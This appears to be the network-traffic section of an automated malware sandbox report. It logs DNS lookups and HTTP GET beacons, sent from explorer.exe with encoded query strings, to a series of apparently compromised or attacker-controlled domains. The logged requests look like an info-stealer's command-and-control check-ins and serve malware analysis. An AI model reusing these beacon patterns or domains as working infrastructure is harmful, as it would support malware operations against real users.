Feb 23, 2021 08:58:07.205092907 CET	80	49734	13.57.130.120	192.168.2.5
Feb 23, 2021 08:58:12.075892925 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.203922987 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.204191923 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.204418898 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.338124037 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338160992 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338188887 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338217020 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338243961 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338269949 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338298082 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338330984 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338361025 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338387966 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.338392019 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.338432074 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.338438988 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.338443995 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.465953112 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.465997934 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466032982 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466078043 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466116905 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466129065 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.466150999 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.466152906 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466188908 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466224909 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466259003 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466264963 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.466269970 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.466295004 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466329098 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466375113 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466408968 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:12.466523886 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.466530085 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.466532946 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.466696024 CET	49735	80	192.168.2.5	54.85.86.211
Feb 23, 2021 08:58:12.593298912 CET	80	49735	54.85.86.211	192.168.2.5
Feb 23, 2021 08:58:17.565337896 CET	49736	80	192.168.2.5	34.90.54.238
Feb 23, 2021 08:58:17.613014936 CET	80	49736	34.90.54.238	192.168.2.5
Feb 23, 2021 08:58:17.613121986 CET	49736	80	192.168.2.5	34.90.54.238
Feb 23, 2021 08:58:17.613405943 CET	49736	80	192.168.2.5	34.90.54.238
Feb 23, 2021 08:58:17.661071062 CET	80	49736	34.90.54.238	192.168.2.5
Feb 23, 2021 08:58:17.661597013 CET	80	49736	34.90.54.238	192.168.2.5
Feb 23, 2021 08:58:17.661609888 CET	80	49736	34.90.54.238	192.168.2.5
Feb 23, 2021 08:58:17.661828995 CET	49736	80	192.168.2.5	34.90.54.238
Feb 23, 2021 08:58:17.661856890 CET	49736	80	192.168.2.5	34.90.54.238
Feb 23, 2021 08:58:17.713300943 CET	80	49736	34.90.54.238	192.168.2.5
Feb 23, 2021 08:58:22.773782015 CET	49737	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:58:22.814690113 CET	80	49737	34.102.136.180	192.168.2.5
Feb 23, 2021 08:58:22.814949989 CET	49737	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:58:22.815170050 CET	49737	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:58:22.855972052 CET	80	49737	34.102.136.180	192.168.2.5
Feb 23, 2021 08:58:22.954349995 CET	80	49737	34.102.136.180	192.168.2.5
Feb 23, 2021 08:58:22.954389095 CET	80	49737	34.102.136.180	192.168.2.5
Feb 23, 2021 08:58:22.954531908 CET	49737	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:58:22.954608917 CET	49737	80	192.168.2.5	34.102.136.180
Feb 23, 2021 08:58:22.995392084 CET	80	49737	34.102.136.180	192.168.2.5
Feb 23, 2021 08:58:33.299643993 CET	49738	80	192.168.2.5	154.91.61.105
Feb 23, 2021 08:58:36.302233934 CET	49738	80	192.168.2.5	154.91.61.105
Feb 23, 2021 08:58:42.318190098 CET	49738	80	192.168.2.5	154.91.61.105
Feb 23, 2021 08:58:54.831653118 CET	49739	80	192.168.2.5	154.91.61.105
Feb 23, 2021 08:58:57.835094929 CET	49739	80	192.168.2.5	154.91.61.105

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 08:56:35.955482960 CET	52704	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:36.007077932 CET	53	52704	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:36.239656925 CET	52212	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:36.291347027 CET	53	52212	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:36.403825045 CET	54302	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:36.452589035 CET	53	54302	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:36.565407038 CET	53784	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:36.614387989 CET	53	53784	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:37.193017960 CET	65307	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:37.244647980 CET	53	65307	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:37.477365017 CET	64344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:37.526056051 CET	53	64344	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:38.939780951 CET	62060	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:38.988445044 CET	53	62060	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:39.876188040 CET	61805	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:39.924889088 CET	53	61805	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:40.971841097 CET	54795	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:41.029036999 CET	53	54795	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:41.937917948 CET	49557	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:41.987518072 CET	53	49557	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:43.116148949 CET	61733	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:43.142633915 CET	65447	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:43.174614906 CET	53	61733	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:43.207350969 CET	53	65447	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:44.577920914 CET	52441	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:44.626645088 CET	53	52441	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:45.774638891 CET	62176	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:45.823354006 CET	53	62176	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:47.020380974 CET	59596	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:47.072390079 CET	53	59596	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:48.178019047 CET	65296	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:48.229912043 CET	53	65296	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:49.320511103 CET	63183	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:49.369152069 CET	53	63183	8.8.8.8	192.168.2.5
Feb 23, 2021 08:56:50.716367960 CET	60151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:56:50.768454075 CET	53	60151	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:04.596348047 CET	56969	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:04.658051014 CET	53	56969	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:15.954601049 CET	55161	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:16.007508039 CET	53	55161	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:30.171575069 CET	54757	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:30.234869957 CET	53	54757	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:32.386890888 CET	49992	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:32.399264097 CET	60075	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:32.435621023 CET	53	49992	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:32.457739115 CET	53	60075	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:32.559315920 CET	55016	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:32.608166933 CET	53	55016	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:42.624135971 CET	64345	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:43.626622915 CET	64345	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:43.685693026 CET	53	64345	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:43.926274061 CET	57128	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:44.073349953 CET	53	57128	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:49.474215031 CET	54791	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:50.102022886 CET	53	54791	8.8.8.8	192.168.2.5
Feb 23, 2021 08:57:55.522838116 CET	50463	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:57:55.593292952 CET	53	50463	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:00.814778090 CET	50394	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:01.037513971 CET	53	50394	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:02.300045967 CET	58530	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:02.370999098 CET	53	58530	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:06.523142099 CET	53813	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:06.592775106 CET	53	53813	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:12.012454987 CET	63732	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:12.074486971 CET	53	63732	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:17.494049072 CET	57344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:17.563788891 CET	53	57344	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:22.681061029 CET	54450	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:22.772489071 CET	53	54450	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:27.961551905 CET	59261	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:28.023690939 CET	53	59261	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:33.085443974 CET	57151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:33.297590971 CET	53	57151	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:54.751465082 CET	59413	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:54.816216946 CET	53	59413	8.8.8.8	192.168.2.5
Feb 23, 2021 08:58:59.339791059 CET	60516	53	192.168.2.5	8.8.8.8
Feb 23, 2021 08:58:59.422525883 CET	53	60516	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 08:57:43.926274061 CET	192.168.2.5	8.8.8.8	0x14bd	Standard query (0)	www.abaplants.com	A (IP address)	IN (0x0001)
Feb 23, 2021 08:57:49.474215031 CET	192.168.2.5	8.8.8.8	0x349	Standard query (0)	www.cyjulebu.com	A (IP address)	IN (0x0001)
Feb 23, 2021 08:57:55.522838116 CET	192.168.2.5	8.8.8.8	0x25e1	Standard query (0)	www.denisekohli.com	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:00.814778090 CET	192.168.2.5	8.8.8.8	0x6f16	Standard query (0)	www.hostsnc.com	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:06.523142099 CET	192.168.2.5	8.8.8.8	0xadb4	Standard query (0)	www.assemble-4u.com	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:12.012454987 CET	192.168.2.5	8.8.8.8	0x756c	Standard query (0)	www.raphaelyejesiel.com	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:17.494049072 CET	192.168.2.5	8.8.8.8	0x4002	Standard query (0)	www.your-new-body-plan.com	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:22.681061029 CET	192.168.2.5	8.8.8.8	0x6611	Standard query (0)	www.softwaresreports.info	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:27.961551905 CET	192.168.2.5	8.8.8.8	0x1d8b	Standard query (0)	www.gdzas08.cloud	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:33.085443974 CET	192.168.2.5	8.8.8.8	0x90d5	Standard query (0)	www.athomecp.com	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:54.751465082 CET	192.168.2.5	8.8.8.8	0x5ac6	Standard query (0)	www.athomecp.com	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:59.339791059 CET	192.168.2.5	8.8.8.8	0x70be	Standard query (0)	www.shamansmoke.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 08:57:44.073349953 CET	8.8.8.8	192.168.2.5	0x14bd	No error (0)	www.abaplants.com	abaplants.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 08:57:44.073349953 CET	8.8.8.8	192.168.2.5	0x14bd	No error (0)	abaplants.com		50.87.196.120	A (IP address)	IN (0x0001)
Feb 23, 2021 08:57:50.102022886 CET	8.8.8.8	192.168.2.5	0x349	No error (0)	www.cyjulebu.com	jinrifresh.web7.cname-cdn.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 08:57:50.102022886 CET	8.8.8.8	192.168.2.5	0x349	No error (0)	jinrifresh.web7.cname-cdn.com	al27.cname-url.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 08:57:50.102022886 CET	8.8.8.8	192.168.2.5	0x349	No error (0)	al27.cname-url.com	104.233.225.185.cname-url.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 08:57:50.102022886 CET	8.8.8.8	192.168.2.5	0x349	No error (0)	104.233.225.185.cname-url.com		170.106.171.56	A (IP address)	IN (0x0001)
Feb 23, 2021 08:57:55.593292952 CET	8.8.8.8	192.168.2.5	0x25e1	No error (0)	www.denisekohli.com	denisekohli.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 08:57:55.593292952 CET	8.8.8.8	192.168.2.5	0x25e1	No error (0)	denisekohli.com		34.102.136.180	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:01.037513971 CET	8.8.8.8	192.168.2.5	0x6f16	No error (0)	www.hostsnc.com		156.240.32.114	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:06.592775106 CET	8.8.8.8	192.168.2.5	0xadb4	No error (0)	www.assemble-4u.com	assemble-4u.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 08:58:06.592775106 CET	8.8.8.8	192.168.2.5	0xadb4	No error (0)	assemble-4u.com		13.57.130.120	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:12.074486971 CET	8.8.8.8	192.168.2.5	0x756c	No error (0)	www.raphaelyejesiel.com		54.85.86.211	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:17.563788891 CET	8.8.8.8	192.168.2.5	0x4002	No error (0)	www.your-new-body-plan.com		34.90.54.238	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:22.772489071 CET	8.8.8.8	192.168.2.5	0x6611	No error (0)	www.softwaresreports.info	softwaresreports.info		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 08:58:22.772489071 CET	8.8.8.8	192.168.2.5	0x6611	No error (0)	softwaresreports.info		34.102.136.180	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:28.023690939 CET	8.8.8.8	192.168.2.5	0x1d8b	Name error (3)	www.gdzas08.cloud	none	none	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:33.297590971 CET	8.8.8.8	192.168.2.5	0x90d5	No error (0)	www.athomecp.com		154.91.61.105	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:54.816216946 CET	8.8.8.8	192.168.2.5	0x5ac6	No error (0)	www.athomecp.com		154.91.61.105	A (IP address)	IN (0x0001)
Feb 23, 2021 08:58:59.422525883 CET	8.8.8.8	192.168.2.5	0x70be	No error (0)	www.shamansmoke.com	shaman-smoke.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 08:58:59.422525883 CET	8.8.8.8	192.168.2.5	0x70be	No error (0)	shaman-smoke.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 08:58:59.422525883 CET	8.8.8.8	192.168.2.5	0x70be	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.abaplants.com

www.cyjulebu.com

www.denisekohli.com

www.hostsnc.com

www.assemble-4u.com

www.raphaelyejesiel.com

www.your-new-body-plan.com

www.softwaresreports.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49729	50.87.196.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 08:57:44.267937899 CET	3076	OUT	GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1 Host: www.abaplants.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 08:57:44.464051008 CET	4548	IN	HTTP/1.1 500 Internal Server Error Date: Tue, 23 Feb 2021 07:57:44 GMT Server: Apache Content-Length: 685 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 61 62 61 70 6c 61 6e 74 73 2e 61 62 61 62 65 61 75 74 79 74 72 61 69 6e 69 6e 67 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@abaplants.ababeautytraining.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49730	170.106.171.56	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 08:57:50.307199955 CET	5447	OUT	GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1 Host: www.cyjulebu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 08:57:50.513550997 CET	5449	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 23 Feb 2021 07:57:48 GMT Content-Type: text/html Content-Length: 1039 Connection: close Set-Cookie: security_session_verify=9ebc6a29fa9e7c317eed3150247f3800; expires=Fri, 26-Feb-21 15:57:48 GMT; path=/; HttpOnly Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 6e 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c 6f 73 65 22 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 73 74 72 69 6e 67 54 6f 48 65 78 28 73 74 72 29 7b 76 61 72 20 76 61 6c 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 74 72 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 7b 69 66 28 76 61 6c 20 3d 3d 20 22 22 29 76 61 6c 20 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 65 6c 73 65 20 76 61 6c 20 2b 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 7d 72 65 74 75 72 6e 20 76 61 6c 3b 7d 66 75 6e 63 74 69 6f 6e 20 59 75 6e 53 75 6f 41 75 74 6f 4a 75 6d 70 28 29 7b 20 76 61 72 20 77 69 64 74 68 20 3d 73 63 72 65 65 6e 2e 77 69 64 74 68 3b 20 76 61 72 20 68 65 69 67 68 74 3d 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 20 76 61 72 20 73 63 72 65 65 6e 64 61 74 65 20 3d 20 77 69 64 74 68 20 2b 20 22 2c 22 20 2b 20 68 65 69 67 68 74 3b 76 61 72 20 63 75 72 6c 6f 63 61 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 2d 31 20 3d 3d 20 63 75 72 6c 6f 63 61 74 69 6f 6e 2e 69 6e 64 65 78 4f 66 28 22 73 65 63 75 72 69 74 79 5f 76 65 72 69 66 79 5f 22 29 29 7b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 22 73 72 63 75 72 6c 3d 22 20 2b 20 73 74 72 69 6e 67 54 6f 48 65 78 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 20 2b 20 22 3b 70 61 74 68 3d 2f 3b 22 3b 7d 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 20 3d 20 22 2f 6f 77 77 73 2f 3f 46 5a 41 3d 4c 4e 74 63 5a 34 6f 33 52 53 62 69 4d 33 71 31 58 50 35 20 33 71 50 58 78 46 64 57 43 51 4c 38 46 56 7a 65 68 44 68 7a 54 65 31 68 35 39 73 6a 7a 61 76 6b 73 77 4c 48 4d 72 4f 53 4e 32 57 52 79 4c 76 50 26 47 7a 72 58 3d 42 78 6f 30 73 72 63 26 73 65 63 75 72 69 74 79 5f 76 65 72 69 66 79 5f 64 61 74 61 3d 22 20 2b 20 73 74 72 69 6e 67 54 6f 48 65 78 28 73 63 72 65 65 6e 64 61 74 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 73 65 74 54 69 6d 65 6f 75 74 28 22 59 75 6e 53 75 6f 41 75 74 6f 4a 75 6d 70 28 29 22 2c 20 35 30 29 3b Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/><meta http-equiv="Connection" content="Close"/><script type="text/javascript">function stringToHex(str){var val="";for(var i = 0; i < str.length; i++){if(val == "")val = str.charCodeAt(i).toString(16);else val += str.charCodeAt(i).toString(16);}return val;}function YunSuoAutoJump(){ var width =screen.width; var height=screen.height; var screendate = width + "," + height;var curlocation = window.location.href;if(-1 == curlocation.indexOf("security_verify_")){ document.cookie="srcurl=" + stringToHex(window.location.href) + ";path=/;";}self.location = "/owws/?FZA=LNtcZ4o3RSbiM3q1XP5 3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src&security_verify_data=" + stringToHex(screendate);}</script><script>setTimeout("YunSuoAutoJump()", 50);
Feb 23, 2021 08:57:50.513581991 CET	5449	IN	Data Raw: 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 32 30 32 31 2d 30 32 2d 32 33 20 31 35 3a 35 37 3a 34 38 2d 2d 3e 3c 2f 68 74 6d 6c 3e Data Ascii: </script></head>...2021-02-23 15:57:48--></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
